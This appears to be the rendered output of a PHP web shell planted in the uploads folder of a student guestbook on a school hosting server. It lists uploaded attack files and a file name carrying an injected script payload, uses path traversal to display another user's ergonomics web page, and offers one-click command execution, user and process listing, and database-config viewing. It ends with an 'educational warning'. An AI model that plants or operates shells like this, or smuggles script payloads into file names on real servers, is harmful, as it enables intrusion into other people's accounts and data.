🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../589181.klas4s23.mid-ica.nl/public_html/ergowijzer/detailPageWorkplace.html

<!DOCTYPE html>
<html lang="en">

<head>
    <link rel="icon" type="image/x-icon" sizes="32x32" href="img/logo4.png">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ErgoWijzer - NexusCode</title>
    <link rel="stylesheet" href="css/main.css">
</head>

<body>
    <div class="wrapper" id="wrapper">
        <div id="navbar" class="navbar">
            <div class="NAVsphere"></div>
            <div class="NAVicon">NexusCode</div>
            <div class="NAVlinks">
                <a class="NAVlink" href="index.html">Home</a>
                <a class="NAVlink" href="about.html">About</a>
                <a class="NAVlink" href="toolsPage.html">Tools</a>
            </div>
        </div>
        <div id="pageIdentifier">OptimizingYourWorkplace</div>
        <div id="content" class="content">
            <h1 class="detailPageTitle">Optimizing Your Workplace</h1>
            <div class="bar"></div>
            <div class="detailPageContent">
                <div class="detailPageIntroText">
                    <p>
                        In today's digital age, many of us spend long hours at our workstations, often glued to screens
                        and typing away on keyboards. However, prolonged periods of repetitive motions can lead to
                        Repetitive Strain Injuries (RSIs), causing discomfort and hindering productivity. Fortunately,
                        by optimizing our workplaces, we can minimize the risk of RSIs and promote a healthier, more
                        ergonomic environment.
                    </p>
                    <p>
                        In addition to the physical discomfort caused by RSIs, they can also have significant long-term
                        effects on our health and well-being, potentially leading to chronic pain and decreased quality
                        of life. Moreover, the economic impact of RSIs cannot be overlooked, as they contribute to
                        increased healthcare costs and absenteeism in the workplace. By prioritizing ergonomics and
                        implementing preventative measures, individuals and organizations can not only reduce the
                        incidence of RSIs but also enhance overall productivity and employee satisfaction.
                    </p>
                </div>
                <div id="imageSlider">
                    <div id="imageSliderContainer">
                        <!-- Hier komen de slides (automatisch door JS) -->
                        <!-- ZET HIER NIKS IN -->
                    </div>
                    <div id="slideDots">
                        <!-- Hier komen de dots (automatisch door JS) -->
                        <!-- ZET HIER NIKS IN -->
                    </div>
                </div>
    
                <div id="slideInfo">
                    <div class="slideTitleAndButtons">
                        <div id="prevImg" class="slideButtons sbl" onclick="prevSlide()">
                            <img src="img/arrow Left.png" alt="Prev" class="nextPrevButton">
                        </div>
                        <div id="slideTitle"></div>
                        <div id="nextImg" class ="slideButtons sbr" onclick="nextSlide()">
                            <img src="img/arrow Right.png" alt="Next" class="nextPrevButton">
                        </div>
                    </div>
                    <div id="slideDescription"></div>
                </div>
            </div>
        </div>
    </div>
    <div class="footer" id="footer">
        <div class="FTcontact">Contact<br>Mail:<br>- example@gmail.com<br>Phone:<br>- 1234567890</div>
        <div class="FTterms">
            <a class="termsLink" href="termsOfUse.html">Terms of Use</a>
            <a class="termsLink" href="cookieUsage.html">Cookie Usage</a>
        </div>
        <img src="img/footerSpheres.svg" alt="" id="footerSpheres">
    </div>
    <script src="js/detailPage.js"></script>
</body>



</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!